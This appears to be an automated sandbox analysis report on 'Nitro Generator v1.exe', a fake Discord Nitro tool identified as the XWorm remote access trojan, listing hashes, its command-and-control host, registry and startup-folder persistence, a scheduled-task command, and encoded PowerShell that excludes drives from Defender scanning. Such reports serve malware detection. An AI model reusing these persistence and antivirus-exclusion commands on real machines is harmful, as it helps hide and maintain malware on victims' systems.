Analysis
-
max time kernel
105s -
max time network
51s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 23:03
Static task
static1
Behavioral task
behavioral1
Sample
Nitro Generator v1.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
Nitro Generator v1.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Nitro Generator v1.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
Nitro Generator v1.exe
Resource
win11-20240508-en
General
-
Target
Nitro Generator v1.exe
-
Size
225KB
-
MD5
a2da88430b3dd46d547cd75126ecee69
-
SHA1
c41229461c4b6ddc695c8a01940e76a0f0b930b7
-
SHA256
c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12
-
SHA512
c3dcfa26d3c2a10f5ac58cd22f2c5bf5fbb986c11a43a547e0ea1f4ac016819de46bfadab6d111e83c2c9f572285a7f3ea4e275944ef7c16bf98426283fac859
-
SSDEEP
3072:LVAzYZD5kDzAgXKnj8meFDm8Zk5WFEw2zlXPcARAK4Mtx1Nnva/Vk5uAOcU3aQg7:LVBZ+DsfnwmlMkQEaARV4MT6dY9Mg59
Malware Config
Extracted
xworm
runderscore00-25851.portmap.host:25851
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\Nitro Generator.exe family_xworm behavioral3/memory/3772-38-0x0000000000850000-0x000000000086A000-memory.dmp family_xworm -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Nitro Generator v1.exeNitro Generator.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation Nitro Generator v1.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation Nitro Generator.exe -
Drops startup file 2 IoCs
Processes:
Nitro Generator.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Nitro Generator.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Nitro Generator.exe -
Executes dropped EXE 4 IoCs
Processes:
NitroGen.exeNitro Generator.exesvchostsvchostpid process 1000 NitroGen.exe 3772 Nitro Generator.exe 464 svchost 3432 svchost -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Nitro Generator.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" Nitro Generator.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com -
Drops file in Windows directory 1 IoCs
Processes:
Nitro Generator v1.exedescription ioc process File created C:\Windows\Nitro Generator.exe Nitro Generator v1.exe -
Processes:
powershell.exepowershell.exepid process 2816 powershell.exe 3180 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exeNitro Generator.exepid process 2816 powershell.exe 2816 powershell.exe 3180 powershell.exe 3180 powershell.exe 3772 Nitro Generator.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exeNitro Generator.exepowershell.exesvchostsvchostdescription pid process Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 3772 Nitro Generator.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeDebugPrivilege 3772 Nitro Generator.exe Token: SeDebugPrivilege 464 svchost Token: SeDebugPrivilege 3432 svchost -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Nitro Generator.exepid process 3772 Nitro Generator.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
Nitro Generator v1.exeNitro Generator.exedescription pid process target process PID 4068 wrote to memory of 2816 4068 Nitro Generator v1.exe powershell.exe PID 4068 wrote to memory of 2816 4068 Nitro Generator v1.exe powershell.exe PID 4068 wrote to memory of 3180 4068 Nitro Generator v1.exe powershell.exe PID 4068 wrote to memory of 3180 4068 Nitro Generator v1.exe powershell.exe PID 4068 wrote to memory of 1000 4068 Nitro Generator v1.exe NitroGen.exe PID 4068 wrote to memory of 1000 4068 Nitro Generator v1.exe NitroGen.exe PID 4068 wrote to memory of 3772 4068 Nitro Generator v1.exe Nitro Generator.exe PID 4068 wrote to memory of 3772 4068 Nitro Generator v1.exe Nitro Generator.exe PID 3772 wrote to memory of 2724 3772 Nitro Generator.exe schtasks.exe PID 3772 wrote to memory of 2724 3772 Nitro Generator.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"2⤵
- Executes dropped EXE
PID:1000
-
-
C:\Windows\Nitro Generator.exe"C:\Windows\Nitro Generator.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2724
-
-
-
C:\ProgramData\svchostC:\ProgramData\svchost1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:464
-
C:\ProgramData\svchostC:\ProgramData\svchost1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3432
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
1KB
MD5e1d7973fb9071815b4241da5ec0dfb6a
SHA141f06afbd0ac9f9a0b226a2dd6fa9495d83209b9
SHA256b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b
SHA51266163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900
-
Filesize
139KB
MD516c70bc93e70148d8e32877fb69c5163
SHA19997631ad75d02297a4c7a06c37db115a0a1c0ec
SHA256b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d
SHA51202242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
77KB
MD58bbf53c41f2625a3c4e608ad13cb2c55
SHA13335287d42f6e674eb1d4465949e02d262bb8391
SHA256ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299
SHA5129c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec